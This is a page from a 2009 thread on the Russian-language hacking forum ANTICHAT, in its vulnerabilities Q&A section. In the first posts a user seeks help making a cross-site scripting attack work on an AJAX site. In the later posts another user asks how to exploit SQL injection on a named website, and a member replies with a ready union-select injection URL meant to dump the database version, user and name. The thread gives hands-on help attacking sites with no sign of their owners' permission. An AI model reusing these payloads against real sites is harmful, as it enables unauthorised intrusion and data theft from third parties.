HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 541 из 2422 « Первая < 41441491531 537 538 539 540 541 542 543 544 545 55159164110411541 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.02.2009, 02:41
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию
Цитата:
Сообщение от o3,14um  
Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка:


что это может быть?

mozarat, покажи свой запрос, что ты составляешь
Это ответ сервера такой, или ИЕ не может распарсить полученый XML ? (Проверь сниффером)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #2  
Старый 12.02.2009, 02:56
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере:
Цитата:
Ошибка!
Ошибка разбора XML

Ошибка разбора XML: синтаксическая ошибка (Строка: 1, Символ: 0)

Обработать документ как HTML
Ошибка:unexpected text (non-whitespace text outside root element)
Описание:http://www.w3.org/TR/REC-xml/
1: ok
А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот.

Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно
Последний раз редактировалось o3,14um; 12.02.2009 в 03:04..
 
Ответить с цитированием

  #3  
Старый 12.02.2009, 03:09
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию
Цитата:
Сообщение от o3,14um  
Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере:


А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот.

Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно
Ну наверно надо втулить коректный xml в ответе что бы небыло ошибко. А вобше аяксом(вернее XMLHttpRequest) ты не отравишь ничего на другой хост ибо политики безопасности не дадут.
Последний раз редактировалось AkyHa_MaTaTa; 12.02.2009 в 03:12..
 
Ответить с цитированием

  #4  
Старый 12.02.2009, 17:15
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
Или так оно не примет и о xss можно забыть?
Последний раз редактировалось o3,14um; 12.02.2009 в 17:21..
 
Ответить с цитированием

  #5  
Старый 12.02.2009, 20:50
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию
Цитата:
Сообщение от o3,14um  
так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
Или так оно не примет и о xss можно забыть?
А у тебя есть возможность изменить action? Или ты пытаешь автоформу зделать? Ну xss возможна если ты можешь встроить в страницу свой html(js) код посредством изменения каких то параметров передоваемых скрипту(грубо говоря и не вдаваясь в подробности), и если ты отправляешь форму(обычную) post на http://hacsite.ru/12.php то следуя из ошибко видно что у тебя отрпавляеться Content-type: text/xml(ну или xslt) в ответе от http://hacsite.ru/12.php но возрашаемое тело документа далеко не xml.
 
Ответить с цитированием

  #6  
Старый 12.02.2009, 20:35
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию
http://www.panelmonkey.org/category.php?id=1

Здрасте всем . Што делот , немогу некак понять , если там вопше Sql ?
 
Ответить с цитированием

  #7  
Старый 12.02.2009, 20:44
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
По умолчанию
есть
 
Ответить с цитированием

  #8  
Старый 12.02.2009, 20:45
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию
Помагите , зделот хут кокойто запрос ...
 
Ответить с цитированием

  #9  
Старый 12.02.2009, 20:50
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


По умолчанию
http://www.panelmonkey.org/background.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--
 
Ответить с цитированием

  #10  
Старый 12.02.2009, 20:57
Saiga
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912

Репутация: -4
По умолчанию
странно!

-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.

И на все тругие тоше самое ..
 
Ответить с цитированием
Ответ
Страница 541 из 2422 « Первая < 41441491531 537 538 539 540 541 542 543 544 545 55159164110411541 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.